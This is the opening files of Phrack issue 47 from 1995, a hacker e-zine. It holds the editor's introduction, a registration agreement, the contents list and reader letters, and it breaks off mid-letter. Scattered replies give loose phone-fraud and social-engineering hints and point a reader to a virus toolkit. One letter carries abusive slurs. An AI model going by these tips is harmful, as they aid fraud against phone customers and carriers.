==Phrack Magazine== Volume Six, Issue Forty-Seven, File 1 of 22 Issue 47 Index ___________________ P H R A C K 4 7 April 15, 1995 ___________________ "Mind The Gap" This issue is late, so is my tax return, but I have a lot of excuses for both. Lots of things have happened since last issue. I've been hassled by the police for publishing Phrack. I've been to the Pyramids at Giza and the tombs in the Valley of the Kings. I've been to London several times and met spies from MI5 and GCHQ. I watched almost everyone I know get busted. I went to check out NORAD and then skiied Breckenridge. And I quit my job at Dell Computers after almost 3 years. Unemployment is great. One of the best things about it is sleeping till noon. On the other hand, one of the worst things about it is that you sleep until noon. It's been interesting anyway. I've been doing a lot of reading: price evaluation of the forensic chemistry section of the Sigma Chemicals catalog, the rantings of Hunter S. Thompson, the amazing cosmetic similarities between International Design Magazine and Wired, Victor Ostrovsky's Mossad books, every UNIX book ever written, every book on satellite communications ever written, and hundreds of magazines ranging from Film Threat to Sys Admin to Monitoring Times to Seventeen. Lord knows what I'll do with this newfound wealth of information. Anyway, amongst all this, I've been trying to get things organized for Summercon this June 2,3,4 in Atlanta Georgia. One of the other factors in the delay of Phrack was the hotel contract, so I could include full conference details in this issue. By the way, you are all invited. Wait a minute, someone said something about busts? Yes. There were busts. Lots of them. Raids upon raids upon raids. Some local, some federal. Some Justice, some Treasury. You probably haven't read of any of these raids, nor will you, but they happened. It has always been my policy not to report on any busts that have not gained media coverage elsewhere, so I'm not going to go into any details. Just rest somewhat assured that if you haven't been raided by now, then you probably won't be. (At least not due to these particular investigations.) People, if we all just followed one simple rule none of us would ever have any problems: DO NOT HACK ANYTHING IN YOUR OWN COUNTRY. If you are German, don't hack Germany! If you are Danish, don't hack Denmark! If you are Australian, don't hack Australia! IF YOU ARE AMERICAN, DON'T HACK AMERICA! The last controversy surrounding this issue came at the last possible second. In the several years that I've been publishing Phrack, we've revieved all kinds of files, but remarkably, I've never really recieved any "anarchy" files. However, in the last several months I've been inundated with files about making bombs. There were so many coming in, that I really couldn't ignore them. Some of them were pretty damn good too. So I figured, I'll put several of them together and put in ONE anarchy file as a kind of tongue-in-cheek look at the kind of stupidity we have floating around in the underground. Then the bomb went off in Oklahoma City. Then Unabomb struck again. Then the politicos of the world started spouting off about giving the federal law enforcement types carte blanche to surveil and detain people who do things that they don't like, especially with regards to terrorist like activites. Normally, I don't really give a damn about possible reprocussions of my writing, but given the political climate of the day, I decided that it would really be stupid for me to print these files. I mean, one was REAL good, and obviously written by someone who learned "British" English in a non English-speaking country. I mentioned my concerns to an individual who works with the FBI's counter-terrorism group, and was told that printing the file would probably be the stupidest thing I could possibly do in my entire life...PERIOD. So the file is nixed. I really feel like I'm betraying myself and my readership, for giving into the underlying political climate of the day, and falling prey to a kind of prior-restraint, but I really don't need the grief. I'm on enough lists as it is, so I really don't need to be the focus of some multi-jurisdictional task-force on terrorism because I published a file on how to make a pipe bomb over the Internet. (Hell, I'm now even on the Customs Department's list of ne'er-do-wells since someone from Europe thought it would be funny to send me some kind of bestiality magazine which was siezed. Thanks a lot, asshole, whoever you are.) Obviously, the media think the net is some kind of hotbed for bomb-making info, so I'm usually the first to satisfy their most warped yellow-journalistic fantasies, but not this time. I really hate what I see coming because of the mess in Oklahoma. If the American government does what I suspect, we will be seeing a major conservative backlash, a resurgence of Hoover-esque power in the FBI, constitutional amendments to limit free speech, and a bad time for everyone, especially known-dissenters and suspicious folk like yours truly. Be very afraid. I am. But anyway, enough of my rambling, here is Issue 47. ------------------------------------------------------------------------- READ THE FOLLOWING IMPORTANT REGISTRATION INFORMATION Corporate/Institutional/Government: If you are a business, institution or government agency, or otherwise employed by, contracted to or providing any consultation relating to computers, telecommunications or security of any kind to such an entity, this information pertains to you. You are instructed to read this agreement and comply with its terms and immediately destroy any copies of this publication existing in your possession (electronic or otherwise) until such a time as you have fulfilled your registration requirements. A form to request registration agreements is provided at the end of this file. Cost is $100.00 US per user for subscription registration. Cost of multi-user licenses will be negotiated on a site-by-site basis. Individual User: If you are an individual end user whose use is not on behalf of a business, organization or government agency, you may read and possess copies of Phrack Magazine free of charge. You may also distribute this magazine freely to any other such hobbyist or computer service provided for similar hobbyists. If you are unsure of your qualifications as an individual user, please contact us as we do not wish to withhold Phrack from anyone whose occupations are not in conflict with our readership. _______________________________________________________________ Phrack Magazine corporate/institutional/government agreement Notice to users ("Company"): READ THE FOLLOWING LEGAL AGREEMENT. Company's use and/or possession of this Magazine is conditioned upon compliance by company with the terms of this agreement. Any continued use or possession of this Magazine is conditioned upon payment by company of the negotiated fee specified in a letter of confirmation from Phrack Magazine. This magazine may not be distributed by Company to any outside corporation, organization or government agency. This agreement authorizes Company to use and possess the number of copies described in the confirmation letter from Phrack Magazine and for which Company has paid Phrack Magazine the negotiated agreement fee. If the confirmation letter from Phrack Magazine indicates that Company's agreement is "Corporate-Wide", this agreement will be deemed to cover copies duplicated and distributed by Company for use by any additional employees of Company during the Term, at no additional charge. This agreement will remain in effect for one year from the date of the confirmation letter from Phrack Magazine authorizing such continued use or such other period as is stated in the confirmation letter (the "Term"). If Company does not obtain a confirmation letter and pay the applicable agreement fee, Company is in violation of applicable US Copyright laws. This Magazine is protected by United States copyright laws and international treaty provisions. Company acknowledges that no title to the intellectual property in the Magazine is transferred to Company. Company further acknowledges that full ownership rights to the Magazine will remain the exclusive property of Phrack Magazine and Company will not acquire any rights to the Magazine except as expressly set forth in this agreement. Company agrees that any copies of the Magazine made by Company will contain the same proprietary notices which appear in this document. In the event of invalidity of any provision of this agreement, the parties agree that such invalidity shall not affect the validity of the remaining portions of this agreement. In no event shall Phrack Magazine be liable for consequential, incidental or indirect damages of any kind arising out of the delivery, performance or use of the information contained within the copy of this magazine, even if Phrack Magazine has been advised of the possibility of such damages. In no event will Phrack Magazine's liability for any claim, whether in contract, tort, or any other theory of liability, exceed the agreement fee paid by Company. This Agreement will be governed by the laws of the State of Texas as they are applied to agreements to be entered into and to be performed entirely within Texas. The United Nations Convention on Contracts for the International Sale of Goods is specifically disclaimed. This Agreement together with any Phrack Magazine confirmation letter constitute the entire agreement between Company and Phrack Magazine which supersedes any prior agreement, including any prior agreement from Phrack Magazine, or understanding, whether written or oral, relating to the subject matter of this Agreement. The terms and conditions of this Agreement shall apply to all orders submitted to Phrack Magazine and shall supersede any different or additional terms on purchase orders from Company. _________________________________________________________________ REGISTRATION INFORMATION REQUEST FORM We have approximately __________ users. Enclosed is $________ We desire Phrack Magazine distributed by (Choose one): Electronic Mail: _________ Hard Copy: _________ Diskette: _________ (Include size & computer format) Name:_______________________________ Dept:____________________ Company:_______________________________________________________ Address:_______________________________________________________ _______________________________________________________________ City/State/Province:___________________________________________ Country/Postal Code:___________________________________________ Telephone:____________________ Fax:__________________________ Send to: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 ----------------------------------------------------------------------------- Enjoy the magazine. It is for and by the hacking community. Period. Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans) 3L33t : No One News : Datastream Cowboy Busted : Kevin Mitnick Busty : Letha Weapons Photography : The Man New Subscribers : The Mafia Prison Consultant : Co / Dec James Bond : Pierce Brosnan The Man With the Golden Gums : Corrupt Good Single/Bad Album : Traci Lords Thanks To : Voyager, Grayareas, Count Zero, Loq, J. Barr, Onkel Ditmeyer, Treason, Armitage, Substance, David @ American Hacker/Scrambling News Magazine, Dr. B0B, Xxxx Xxxxxxxx Special Thanks To : Everyone for being patient Kiss My Ass Goodbye : Dell Computer Corporation Phrack Magazine V. 6, #47, April, 15 1995. ISSN 1068-1035 Contents Copyright (C) 1995 Phrack Magazine, all rights reserved. Nothing may be reproduced in whole or in part without written permission of the Editor-In-Chief. Phrack Magazine is made available quarterly to the amateur computer hobbyist free of charge. Any corporate, government, legal, or otherwise commercial usage or possession (electronic or otherwise) is strictly prohibited without prior registration, and is in violation of applicable US Copyright laws. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to the list. Phrack Magazine 603 W. 13th #1A-278 (Phrack Mailing Address) Austin, TX 78701 ftp.fc.net (Phrack FTP Site) /pub/phrack http://www.fc.net/phrack.html (Phrack WWW Home Page) phrack@well.sf.ca.us (Phrack E-mail Address) or phrackmag on America Online Submissions to the above email address may be encrypted with the following key : (Not that we use PGP or encourage its use or anything. Heavens no. That would be politically-incorrect. Maybe someone else is decrypting our mail for us on another machine that isn't used for Phrack publication. Yeah, that's it. :) ) ** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** Phrack goes out plaintext...you certainly can subscribe in plaintext. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR tBRwaHJhY2tAd2VsbC5zZi5jYS51cw== =evjv -----END PGP PUBLIC KEY BLOCK----- -= Phrack 47 =- Table Of Contents ~~~~~~~~~~~~~~~~~ 1. Introduction by The Editor 16 K 2. Phrack Loopback / Editorial 52 K 3. Line Noise 59 K 4. Line Noise 65 K 5. The #hack FAQ (Part 1) by Voyager 39 K 6. The #hack FAQ (Part 2) by Voyager 38 K 7. The #hack FAQ (Part 3) by Voyager 51 K 8. The #hack FAQ (Part 4) by Voyager 47 K 9. DEFCon Information 28 K 10. HoHoCon by Netta Gilboa 30 K 11. HoHoCon by Count Zero 33 K 12. HoHo Miscellany by Various Sources 33 K 13. An Overview of Prepaid Calling Cards by Treason 29 K 14. The Glenayre GL3000 Paging and Voice Retrieval System by Armitage 25 K 15. Complete Guide to Hacking Meridian Voice Mail by Substance 10 K 16. DBS Primer from American Hacker Magazine 45 K 17. Your New Windows Background (Part 1) by The Man 39 K 18. Your New Windows Background (Part 2) by The Man 46 K 19. A Guide To British Telecom's Caller ID Service by Dr. B0B 31 K 20. A Day in The Life of a Warez Broker by Xxxx Xxxxxxxx 13 K 21. International Scenes by Various Sources 39 K 22. Phrack World News by Datastream Cowboy 38 K Total: 807 K _______________________________________________________________________________ "Raving changed my life. I've learned how to release my energy blockages. I've been up for forty-eight hours!" John Draper (Capn' Crunch) in High Times, February 1995 "You never know, out in California, all them Cuckoo-heads." Brad Pitt as Early in "Kalifornia" "On the Internet you can have the experience of being jostled by a urine-smelling bum." Bill Maher - Politically Incorrect ==Phrack Magazine== Volume Six, Issue Forty-Seven, File 2 of 22 ***************************************************************************** Phrack Loopback ----------------------------------------------------------------------------- G'Day, You dont know who i am, and i appreciated that but i hope your read my little note here and take it into consideration. Ive been into the Australian Hacking Scene (if there is such a thing :-) for only about 2years, but recenlty opened a h/p bbs here in Australia. What i am writing and asking is if it is possilbe to place kinda an add of some description in the next issue of phrack, something to the lines of:- H/P bbs recently opened in Australia - JeSteRs BBS +61-7-ASK-AROUND If your looking for some form of donation $$ just let me know, if your wondering is his guy a fed or something, mail DATA KING and speak to him, he was one of the bbs first users and as you know he has written in the Int Scene for the last too issues, but wont be in Issue #47 or i would have asked him to place the advertisment in this report. Regards, Jesta [Cool! Nice to see there's BBSs still popping up overseas. It would be nice if I had the number...hell, I'd even call... but oh well, I suppose I (and all the Phrack readers) will just have to "ASK-AROUND"] ----------------------------------------------------------------------------- Hi Erikb, Last week you said you'd accept a bbs ad .. well here it is. If you'd publish it in phrack i'd be most grateful! A Gnu BBS! 1000's h/p Related texts Phrack, CoTNo, B0W, cDc, NiA, CuD, Risks,Sphear,SCAM!,NeuroCactus Conferences covering Unix/VMS/System Security/Phreaking And absolutely no mention of "The Information Super Highway" anywhere! +617-855-2923 tnx, badbird [I said I'd print the ad...and now I have.] ----------------------------------------------------------------------------- ATTN: ALL COMPUTER WHIZ KIDZ..... I DESPARATELY NEED YOUR HELP!!! Retired R.C.M.P officer formerly involved with priority levels of electronic surveillance has informed me that my residential telephone appears to have been compromised at a point other than inside or immediately outside my residence. After an intensive evaluation of the premises his conclusion was that remote manipulation of the telephone company switch where my circuit could be victim was the problem. The main focus of this exercise is to show how one can infiltrate a telephone company's network; remotely manipulate the company's switch; process long distance calling;make it appear that the calls originated from a particular site and then "fooling" the company's billing mechanisms to invoice that particular location. Is this physically possible? Bell Canada categorically denies this possibility. I need proof! How is it done? Please advise as soon as possible. I'd sincerely appreciate any help, advise and/or information anyone out there can offer in this particular situation. Please leave a way to get in touch! If you prefer to remain unknown, thanks a million, and rest assured that I WILL RESPECT and PROTECT you anonimity. Regards, John P. Marinelli jmarinel@freenet.niagara.com [My take on this is that with relative ease, someone could establish call forwarding on a line, make it active to some remote location, and call the original number numerous times, causing the owner of the hacked line to be billed for all the calls to the forwarded location. If anyone knows how to do this, STEP BY STEP on a DMS-100, please, contact Mr. Marinelli to help him out with his court case. I don't know a whole lot about NT equipment, so I don't know the specifics of how this may have happened, only the generalities. Wouldn't it be nice to have the Underground "HELP" someone out for a change?] ----------------------------------------------------------------------------- y0, Black Flag here... heres the info you told me to mail you about the GRaP/H (Gainesville Regional Association of Phreakers and Hackers) meetingz Gainesville, FL 1st + 3rd Saturday of the month, 4pm - ??? meet in The Loop on 13th Street Black Flag will be casually carrying a 2600 look around, you'll see him. [Well, looks like the Florida Hackers have a new place to congregate. And so do the Florida FBI Field Offices. :) ] ----------------------------------------------------------------------------- I was wondering where I could find any virus authoring tools for the PC, Unix, or VMS. [You can find Nowhere Man's Virus Creation ToolKit on BBSs around the globe. Have you looked??? I've never heard of UNIX or VMS virus tools. Do you know something I don't? Do you know how a virus works? ] ----------------------------------------------------------------------------- Chris, found something you might like. Here's an ad from the latest PHOENIX SYSTEMS catalog: THE CALLER ID BLOCKER FIRST TIME AVAILABLE IN THE U.S. By April, 1995 all telephone companies must deliver callers name and telephone number to the caller ID system. The law prohibits any telephone company from offering customers an option to permanently disable their line from the ID system. This means that even if you have an unlisted number, everyone you call will now have your telephone number and name. Big brother is now one watching, now he has your name and number. No more anonymous calls to the IRS, city hall, real estate agents, car dealers, health department or anyone. Many business professionals use their home telephone to return calls. Do you want your patients and clients to have access to your home telephone number? We are proud to bring you the unique ANONYMOUS 100. It installs on any telephone in seconds and completely KILLS THE EFFECTS OF "CALLER ID"! Yes, you can have your privacy back. The ANONYMOUS 100 is FCC approved and carries a one year guarantee. #1276...............................................................$69.95 Is it just me, or is this a load of bullshit? Didn't CA and TX both pass laws to make CLID illegal in those states? I know that before MA would allow it in the state, they told the telco that line blocking had to be offered free (and it is, on per/call and permanent basis). Did the feds pass this new law while I was sleeping, or is this company just playing on paranoia (not the first time) and trying to make a buck? Eric [Well Eric, it looks to me that this is a nifty little box that waits for voltage drop and immediately dials *67 before giving you a dialtone. Woo Woo! $69.95! It certainly is worth that to me to not have to dial 3 digits before I make a call. All that wear and tear ruins the fingers for typing. PFFFT.... About Caller-ID, well, it's legal just about every place I know of. I'm sure there are a feel hold-outs, but offering per-line blocking for individuals worried about privacy satisfied most Public Utility Commissions. In fact, I think April 1 was the date that all Interconnects were supposed to be upgraded to support the transfer of CLID information over long distance calls. I don't think this has been turned on everywhere, but the software is supposed to be in place. *67. Don't dial from home without it.] ----------------------------------------------------------------------------- This message serves a multifold purpose: (these response/comments are in referance to Phrack Issue 46 - Sept 20 1994) A) A question was brought up concerning a Moterola Flip Phone and the user inability to gain access to the programing documentation. I happen to own (legally) a Motorola Flip Phone that I will assume to be the same and I was not given the documentation either, though I have not tried asking for it. I will call Motorola and ask for *my* rightful copy and foreward my results (if I gain access) to phrack for proper distribution amoung appropriate channels. If I do not gain access, I would appriciate to hear from anyone who has (this should not be limited to simply the M. Flip Phone, I have interests in all areas). B) Later in that issue (Sept 20, 1994) a list of university and colege dialups were provided... I live in the 218/701 (right on the border) and have a collection of them for addition to the list if you (or anyone else) should so desire. I would post them now, but I have limited time and have to dig to find them. I also have some numbers that some readers may find of interest. C) My living in the 218/701 is the main reason for my writting. I used to live 612 and knew a lot of people in the area, but now I am stuck here in a little shit town (pop. 7000) where the cloest thing to a computer is made by John Deere. I need to find someone in the 218 or 701 to work with or meet... if you know anyone...??? The closest BBS is long distance and even then it's crap... I would like to start my own, but who the fuck would call? Who the fuck would I invite? My old H/P friends in 612 would, but I don't need the heat as they would all go through 950's or some other method... I think you understand. any help would be greatly appreciated By the way I could also use some 218/701 ANAC or CN/A... any help here? Aesop [In order: a) Good luck with Moto. You'll need it. b) Yes, I really still need your university dialups. Issue 48 will have a much more complete list (I hope!) c) If anyone knows any bbs'es in those area codes, please send them in so I can pass along the info. Other) For CNA information, just call your business office. They ALWAYS help. Especially if you mention that CNA didn't have a current record. :) ] ----------------------------------------------------------------------------- To whom it may concern at phrack, I would like to subscribe to Phrack. I didn't use PGP because :- i. I never had any real need to ii. I came across the document below while dinking around with gopher. I would pretty much guess phrack knows about it already. If you do know about it, could you tell me another way to ensure my mail privacy? Thank you. Xombi. ---------------------BEGIN E-MAIL DOCUMENT--------------------- This section is from the document '/email-lists/Funny'. A lot of people think that PGP encryption is unbreakable and that the NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold was arrested _one day_ before he and others wee to stage a protest at government buildings; the police had a copy of a message sent by Steingold to another activist, a message which had been encrypted with PGP and sent through E-mail. Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to allow the NSA to easily break encoded messages. Early in 1992, the author, Paul Zimmerman, was arrested by Government agents. He was told that he would be set up for trafficking narcotics unless he complied. The Government agency's demands were simple: He was to put a virtually undetectable trapdoor, designed by the NSA, into all future releases of PGP, and to tell no-one. After reading this, you may think of using an earlier version of PGP. However, any version found on an FTP site or bulletin board has been doctored. Only use copies acquired before 1992, and do NOT use a recent compiler to compile them. Virtually ALL popular compilers have been modified to insert the trapdoor (consisting of a few trivial changes) into any version of PGP prior to 2.1. Members of the boards of Novell, Microsoft, Borland, AT&T and other companies were persuaded into giving the order for the modification (each ot these companies' boards contains at least one Trilateral Commission member or Bilderberg Committee attendant). It took the agency more to modify GNU C, but eventually they did it. The Free Software Foundation was threatened with "an IRS investigation", in other words, with being forced out of business, unless they complied. The result is that all versions of GCC on the FTP sites and all versions above 2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC with itself will not help; the code is inserted by the compiler into itself. Recompiling with another compiler may help, as long as the compiler is older than from 1992. [Well, uh, gee, I think the fact that this document came from /email-lists/Funny speaks for itself. I'm satisfied with PGP for security, but then again, I don't have a lot of information that I'm so petrified that I need to keep it encrypted, or that I send out in email that I don't care if anyone sees. To put aside some of your fears, I personally feel that PGP is ok. If the trilateral commission wants your info, they will beat it out of you with sticks, with the help of several multi-jurisdictional task-forces for Federal law enforcement, while you are under the influence of incredibly terrifying and long-lasting hallucinogenic drugs. Don't worry.] ----------------------------------------------------------------------------- Here is a BBS Ad for your next issue: BBS Name: The King's Domain Sysop: Ex-Nihilo Speeds: 1200-14,400 BBS Type: Remote Access 2.02+ Phone #: 208-466-1679 THe BBS has a good selction of "Hood" files... (hacking/phreaking/anarchy) journals such as cDc, Phrack, ATI and more... also a good selection of BBS files which include Doors and Utilities... primarily RA accessories, but not exclusively... supports rip graphics and is online 24 hrs a day [Yet another ad! Is this the rebirth of BBS-dom?] ----------------------------------------------------------------------------- [Editor's Note: I got a letter asking me about how to credit card merchandise. I replied that I didn't agree with carding, and that if the reader really wanted something, he/she should get a job and buy it. This is the response I got.] What the fuck? All I wanted was a fucking decent reply. Get a job, huh? You know, I thought if you were to talk to one of these supposed "computer hackers" you could get some usefull information. Get a job, that rich coming from someone like you. When there's something you want...take it...without using your money. Maybe sometime I'll be able to takl to a hacker not some fucking hypocritical computer geek [Editor's Note: I replied to this letter by stating that carding had nothing to do with hacking, that it was out and out stealing, and although we had published articles about it in Phrack, I wasn't going to help anyone do it, and that he/she should try to contact the authors of various carding articles directly. This is the response that got.] Come on now "Chris", you can do better than that, can't you? Stealing? Who's the thief here, eh? See, when I wake up in the morning, I don't have to worry about secret service, police, or any sort of military shit being in my apartment. I don't get busted for doing stupid things like stealing phone calls off fucking 900 numbers. I think I know exactly why you don't card anything - because you're too fucking stupid or don't even have the balls to do it. Fuck, you'd expect someone like yourself to have different views about being a thief. Well, I guess it takes a certain kind of person to hack into shit like you, but why this person would start flame wars and otherwise just be a total fuckup, I don't know. Or, maybe it's just the singular person I'm talking too, yeah, that's probably i...there probably are other, BETTER, hackers who aren't as fucking arrogant as you. Well, have fun with your hands and PLAYGIRL's, you fucking little punk-ass faggot. And tell your mother that I won't let this affect our relationship. Punk aj276@freenet3.carleton.ca [This is the future of the computer underground??] ----------------------------------------------------------------------------- BBS AD: System is called CyberSphincter (playing off of the current word trend of cyber). The number is 717-788-7435. The NUP is 0-DAY-WAR3Z!!! Modem speeds of 14.4 and lower, with no ANSI. Sysop is Ha Ha Ha. It's running renegade (we know it can be hacked and I've done it already), but we seem to believe in honor among thieves, so try to control yourself on that. -=strata=- [ANOTHER AD!] ----------------------------------------------------------------------------- Hey Erik B... I'm the remote sysop at the Digital Fallou BBS in 516. Just recently, we've been getting a rash of ld callers. A day or two ago, a guy with the handle "Digi-Hacker" applied. His application looked good, execpt that he stated his alter handle was "Eric Bloodaxe" and that he was the editor of Phrack. Now, any lame ass could just "say" that, and we don't want any liars on board. :) So we decided to go right to you thru email. Did you apply? If so, cool. If this isn't you, that guy is gonna most assuredly be deleted.. [Well, I hate to say it, but I don't have time to do much of anything anymore. I certainly don't call bbses with any regularity. I do have accounts on SECTEC and UPT, but that's it. I may call some in the future, but for the most part I don't have any time. If someone calls up a bulletin board and applies as "Erik Bloodaxe" it isn't me. (Anyone saying they are Eric Bloodaxe MOST CERTAINLY isn't me. :) ) Anyone running BBSes may want to take note of this, so they don't get swindled into giving "elite" access to some pretender. You can always email phrack@well.com and ask me if I have applied to your bbs. ] ----------------------------------------------------------------------------- Chris, I know you don't know me, but I figured you of all people could help me, and give me an answer quickly. I just got my phone bill, and on the last page is a page from some company calling themselves Long Distance Billing Co., Inc. It has one call "Billed on behalf of Northstar Communication" It is a call from somewhere in FL, for 13 minutes, costing 51.87. I called LD Inc, and they said the call was a collect call made from Northstar Comm, and that my only recourse was to write a letter to Northstar. Needless to say, I did not accept the collect call, I don't know anyone in 813. I called NYNEX, and they said I should write to Northstar and LD INC, but didn't seem to know anything about either company. They guy I talked to said it was real strange that LD INC didn't give me a number to call at Northstar, since most of this type of thing is handled by phone. I'm beginning to wonder exactly how relieable this LD INC company is, who Northstar is, and most of all who called and how the hell the call was supposedly accepted by my phone. This is all the info I know: BILLED ON BEHALF OF NORTHSTAR COMMUNICATION 1. SEP 18 923PM COL CLEARWATER FL 813-524-5111 NC 13:00 51.87 --From my phone bill Northstar Communication 3665 East Bay Drive Suite 204-192 Largo, FL 34641 --From LD INC Long Distance Billing Co., Inc. 1-800-748-4309 --From NYNE phone bill. If you can think of anything I can do, I;d be really greatful. I don't have $50 to throw away on a call I never got, and I don't have the resources you do to try and figure out who the hell these people are. [It looks to me like you got fucked by someone in Florida using a COCOT payphone. It's kind of odd that NYNEX couldn't help you more...but anyway, I wouldn't pay it. What I suspect happened was that somsone used one of those handy COCOT services where the operators are incredibly stupid and allow calls to be accepted when the "calling party" says "YES" to allow a 3rd party or collect call, rather than the party being called. This happened to me at my previous work extension by New Yorkers using the ENCORE service (even though all our lines were listed to refuse 3rd party and collect calls.)] ----------------------------------------------------------------------------- I've been having some trouble with the law, so all my notes are stashed at a friend's casa at the moment. Can you recommend a good lawyer to defend me for allegedly hacking some government computers? I've got a good crim def guy working with me right now assisting me guring questioning from Special Agents, but I will need someone that has experience if I get indicted. [If you are facing computer crime charges, you are definately in a world of hurt. There are very few computer crime-savvy lawyers practicing in the World. The only thing I can suggest is that you call EFF, CPSR or EPIC and ask them if they know of any lawyers in your area that they can refer you to. None of these groups will help you directly, except under EXTREME circumstances, and only if you have been falsely accused, or have had rights violated. If you are guilty, and the cops have any evidence, you are going to be convicted. Remember Baretta? "If you can't do the time, then don't do the crime."] ----------------------------------------------------------------------------- Dear Chris, You probably don't remember me, but we corresponded about 3 years ago as part of my PhD research. I was at Edinburgh University at the time and am not at UMIST in Manchester (British equivalent of MIT). The reson I'm writing is that I was awarded my PhD last March, and for one reason and another I've been sidetracked into a completely different field of research - the British National Health Service and the various ways computers are being used in it. I tried getting a publisher interested in the thesis, but with little luck. I also sent it to Jim and Gordon at CuD on disk for them to stick it on archive, but they had problems with the formatting of it and don't seem to have got round to archiving i. If you're interested I'd be quite happy to send a couple of disks to you and you can spread it around as you want. It just seems a shame for the people on the net not to get a look at it. It's dressed up in airy-fairy sociological language - but there's still lots in it that I think would be of interest to people on the net. I saw your interview in CuD, and I agree with you about most of the books written on the CU. Mine has its faults but it's got less biographical data and more issue-oriented stuff. Anyway, get in touch and let me know if I can find a good home for my magnum opus. Take care and a belated thanks for all the time you spent in helping me with the PhD. Best Wishes, Paul Taylor School of Management UMIST [Paul: Congrats on your PHD, and continued success at UMIST! I'm putting your thesis up on the Phrack WWW page so that more people can get a look at it! Thanks for sending it!] ----------------------------------------------------------------------------- I read your article on hacking the French among other foreign governments. Sounds pretty fun, just for kicks the other night I did a search of all the computers I could get at in China. One of them was a national power grid computer. Sounds like it could be fun to play with huh? The "They Might Kill Us" part will tend to turn some people off, but not me. [WOW! A National Power Grid Computer! In China! Gee. How many times have you seen Sneakers? Take the tape out of your VCR, slowly run a rare-earth magnet over it and set it on fire. On the other hand, if you were at least partally serious about the hacking for America, keep your eyes open.] ----------------------------------------------------------------------------- Erikb, Regarding your article in Phrack 46, we here in Columbus would just like to say that everything except for the Krack Baby's phone number, which long since went down, and the Free Net template, is total and utter bullshit. The Columbus 2600 meetings were NOT started by Fungal Mutoid, he is just responsible for a much larger turnout since about September (94), and whoever wrote that has obviously not been to a Columbus meeting recently. The Columbus 2600's have been here for quite a while, but bacause the H/P scene consists of 15 people AT THE MOST, many of which haven't the time to attend, the turnout is almost always low. I believe the most that have ever shown up to a meeting is 10, which dwindled to 8 or so before the meeting was officially half-over. Nobody knows who wrote the article which you printed, although no one has been able to contact Fungal Mutoid to ask him. Just thought we'd clear a few things up, and to those that don't give two flying shits, we're sorry to have to bring this into a E-mag as great as this. Sincerely, H.P. Hovercraft and the Columbus H/P Gang [Thanks for the letter. Like I always say, I can only report and print what I'm told or what is sent to me. I don't live anywhere but Austin, TX, so I don't know the intimacies of other areas. Thanks for sending in your comments though!] ----------------------------------------------------------------------------- Haiku Operator hi who is it that sets my phone on redial and tone gives me rest in times great stress lays its head on my leads me into joy cosmos and mizar give evidence and homage to your greatness, why logon/password on your very first try shall succeed, as always oh, A T and T while great, holds non to the great power that NYNEX gives access to in glee, awaitnig, cautiously, for signs of entry illicitly thus strives to maintain control of the ESS switch, not comprehending that control is simply gained by a single call to some stupid yet revered operator who believes you in charge gives out system pass with some small feat of trick'ry PAD to PAD, too, works sounding of the baud with modem and coupler connection is made who is to question the incidence of this fault or acknowledge it security's words false threats followed by arrest on illegal grounds hackers, phreakers grieve free the unjustly accused give them freedom to ROAM with cellular phones place to place with no charge test the system's worth find holes, detect bugs run systems by remote, yea, to explore, to seek, to find a network of free bits and bytes unharmed-- innocently seen. who doesn't know that Bell or Sprint or MCI would never approve-- believe in 'puter crime, toll fraud, "access devices," free calls to Denmark Information is power is imperative proprietary please, spare me the grief accusations being thrown of phone co. crashes are fiction unleashed to the ignorant public eye to make blame, fear all phr/ackers, but all have had their days and faded into the past, why must ignorant block the free flow of knowledge found angry sysops abound secret service rais hoisting games, computers, phones never to be re- turned hackers, phreakers working for government, spies, lies, deception, all to walk free while friends spend years in jail for simply battling for some change knowledge is NOT free equipment costing milliions, simply cannot pay the cost for systems of signal switching; no on e wants to harm, just try to use our knowledge in a constructive way and look around for things which further know-how of packet switching, ANI, proctor tests and tones which make little sense and why is it there, what are all the test lines for? central office trash provides some clues, while phone calls get angry response to inquiries re: loops and lack of barriers, COCOT carriers who overcharge cause frustraton, must be helped end overbilling unfairness is only people not understanding nor comprehending that what we do is NOT always fraud, vengeance or deceitful reasons bu for love of the systems, curiosity's overwhealming need to be met and to feel accomplished, proud, to do and know something WELL crackers abound pirates do multiply, spread wavez of warez cross coasts and foreign countries virus creators seeking escape, growth, freedom not for destruction but for change, to press limits to find that which makes us whole, complete, and accomplished at crossing the barriers that bound conventional people in dead-end jobs with little self-esteem. hacking, phreaking, it is an art form, and a quest for endless reaches to seek, to explore, to realize and accomplish, to take chances and live not for rules and laws but for what things should be but will not come to pass. --kyra [Uh oh, we're getting pretty literary here. I can see it now: Phrack Magazine. For the Sensitive Hack/Phreak. Interesing poem tho...] ----------------------------------------------------------------------------- Dear Editor of Phrack Magazine; Ok Erik (mr. editor), there is also a poem that I have written for Wei. "Thinking of Ding Wei" (C) 1994, 1995 Oliver Richman. Come here, let me tell you something, How I hide my love for Wei Ding: By forgetting all my thinking! When in my mind Wei's heart I see.. I want to tell her "wo ai ni", So her and I will always be. Her mind is pure, like pretty Jade.. She makes me want to give her aid. I know that her love will not fade. My patience tries to move the sea. But can I deny you and me? I want our hearts to set us free. I really love you, dear Ding Wei, I think about you every day. Tell me, what more can I say? [What's this? Another Poem? A tribute of Love for some chick named Wei? Holy Lord. We need to get some codes or credit cards or something in here to offset this burst of "Heartfelt Emotive Print." ] ----------------------------------------------------------------------------- the other day upon the stair i met a man who wasn't there he wasn't there again today i think he's from the CIA [NOW THIS IS MY KIND OF POETRY! SHORT, SIMPLE, AND FUNNY. WHATEVER HAPPENED TO BENNETT CERF???] ----------------------------------------------------------------------------- As a former AOLite and definite wannabe, and having d/l the log of the Rushkoff/Sirius hypechat, I could tell from the beginning that it would be just as you reviewed _Cyberia_ as being. Every other word Rushkoff used was Cyberia or 